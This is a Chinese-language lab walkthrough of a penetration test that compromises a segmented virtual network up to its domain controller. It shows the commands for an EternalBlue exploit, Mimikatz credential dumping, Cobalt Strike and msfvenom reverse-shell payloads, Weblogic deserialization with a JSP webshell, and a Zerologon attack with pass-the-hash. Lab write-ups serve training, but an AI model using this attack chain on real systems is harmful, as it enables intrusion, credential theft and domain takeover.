渗透目标

通过Windows7打入工作组环境,穿透两层内网拿到DC(域控制器)权限
环境搭建

环境搭建

网络拓扑

在这里插入图片描述

虚拟机网络配置

在这里插入图片描述

渗透测试

永恒之蓝外网打点

nmap -sS 192.168.2.0/24扫描外网存活主机,发现两台主机192.168.2.128和192.168.2.129,并且445端口都是打开的,可能存在永恒之蓝漏洞
在这里插入图片描述
用msf来进行永恒之蓝漏洞的利用:search ms17-010
在这里插入图片描述
选择模块3来进行永恒之蓝漏洞的扫描:use 3,发现主机192.168.2.128存在永恒之蓝漏洞

在这里插入图片描述
接着使用攻击模块对这个漏洞进行利用use exploit/windows/smb/ms17_010_eternalblue,同样设置set rhosts=192.168.2.12
在这里插入图片描述
权限已经是SYSTEM权限,简单查看一下系统信息,发现在一个工作组内(Domain: WORKGROUP)
在这里插入图片描述
导入mimikatz,尝试获取票据或者明文密码信息,得到密码:xiaodi
在这里插入图片描述

Cobalt Strike上线Windows 7

关闭防火墙
在这里插入图片描述
开启teamserver
在这里插入图片描述
客户端连接在这里插入图片描述
设置listener并且生成一个包含这个listener的木马
在这里插入图片描述
将木马上传到外网的Windows 7靶机并执行,靶机成功上线,查看网络
在这里插入图片描述
直接跑mimikatz得到密码xiaodi
在这里插入图片描述

psexec横向移动到Windows 10

然后用Portscan扫描主机
在这里插入图片描述
执行完扫描后,Targets中会出现主机192.168.2.129,使用psexec进行横向,输入刚刚得到的用户名和密码:
在这里插入图片描述
成功拿下Windows10
在这里插入图片描述
收集相关信息,发现新的网段192.168.3.*
在这里插入图片描述
扫描一下端口,发现两台主机,一台192.168.3.128是这台Windows 10,另一台就是下一阶段的目标192.168.3.129
在这里插入图片描述

MSF上线Windows 10

先生成一个反向木马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.2.130 lport=6666 -f exe -o m2.exe
在这里插入图片描述
通过Cobalt Strike上传木马

在这里插入图片描述
msf设置监听
在这里插入图片描述
成功上线,查看路由信息
在这里插入图片描述
添加路由
在这里插入图片描述
设置socks代理
在这里插入图片描述配置kaili的全局代理工具proxychains

在这里插入图片描述

Weblogic打入win12

利用工具:https://github.com/rabbitmask/WeblogicScan
换成另一种代理方式,利用Cobalt Strike上代理
在这里插入图片描述
同样修改mousepad /etc/proxychains4.conf,配置好端口,再用
proxychains4 python WeblogicScan.py -u 192.168.3.129 -p 7001启动,发现存在weblogic相关的CVE漏洞
在这里插入图片描述

存在cve-2016-0638,存在cve-2017-10271,存在cve-2017-3506等
然后利用工具:https://github.com/shack2/javaserializetools/releases,
proxychains4 java -jar javaserializetools.jar运行jar包,检测到漏洞
在这里插入图片描述
能够进行命令执行
在这里插入图片描述
冰蝎生成jsp木马在这里插入图片描述
上传生成的jsp木马
在这里插入图片描述
在这里插入图片描述
连接木马
在这里插入图片描述
使用Cobalt Strike中转上线,设置监听
在这里插入图片描述
然后生成木马
在这里插入图片描述
使用冰蝎上传木马执行,成功拿下
在这里插入图片描述
至此拿到了三台机器在这里插入图片描述
收集网络信息,发现网段192.168.10.*
在这里插入图片描述
端口扫描,发现其他两台机器:192.168.10.10和192.168.10.12
在这里插入图片描述

横向移动到Win12-WEB

还是先在weblogic这台机器上跑mimiktaz
在这里插入图片描述
得到明文密码Administrator和Admin12345,再来试试横向移动
首先创建一个监听器,这里由于观察到上述端口扫描的结果中445端口是开放的,因此采用SMB类型监听器在这里插入图片描述
然后进行横向移动在这里插入图片描述因为是中转的,所以有耐心点,等待几分钟后,连接建立
在这里插入图片描述
可以看到成功上线Win12-WEB
在这里插入图片描述
收集Win12-WEB的网络信息
在这里插入图片描述
查看系统信息
在这里插入图片描述
查看权限
在这里插入图片描述

渗透域控

在上一步中192.168.10.*这个网段三个机器已经得到了两个,剩下的192.168.10.10就是我们最后的目标:DC:域控制器
在Win12-WEB这台机器上查看域控:

在这里插入图片描述
Nmap扫描一下,没有发现特别的服务:

在这里插入图片描述
然后尝试寻找DC的相关漏洞,尝试cve-2021-1472
首先使用cobalt strike开代理

在这里插入图片描述
然后配置kali的proxychains4:mousepad /etc/proxychains4.conf
在这里插入图片描述
扫描一下端口:proxychains4 nmap 192.168.10.10,发现没有开什么特殊服务

在这里插入图片描述
没办法,大海捞针,测试一下这个CVE:CVE-2020-1472(https://github.com/SecuraBV/CVE-2020-1472)
在这里插入图片描述
尝试利用这个漏洞:https://github.com/dirkjanm/CVE-2020-1472,成功置空DC密码
在这里插入图片描述
获取hash值
在这里插入图片描述
利用得到的Administrator的hash值:aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3:::来进行横向移动
proxychains4 python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:a402bea39d0f49b50ea1941120780ee3 DC$/Administrator@192.168.10.10
拿到域控shell,渗透结束

在这里插入图片描述

查看网络信息
在这里插入图片描述

# 安全 # 网络 # web安全
Logo
GitCode 开源社区

旨在为数千万中国开发者提供一个无缝且高效的云端环境,以支持学习、使用和贡献开源项目。

更多推荐

cover

GitTalk | 使用面向业务的狮偶编程语言提升开发效率

avatar GitCode 开源社区
cover

GitTalk | DevUI Suits 场景解决方案

avatar GitCode 开源社区
cover

GitTalk | DevUI Admin 前端项目构建

avatar GitCode 开源社区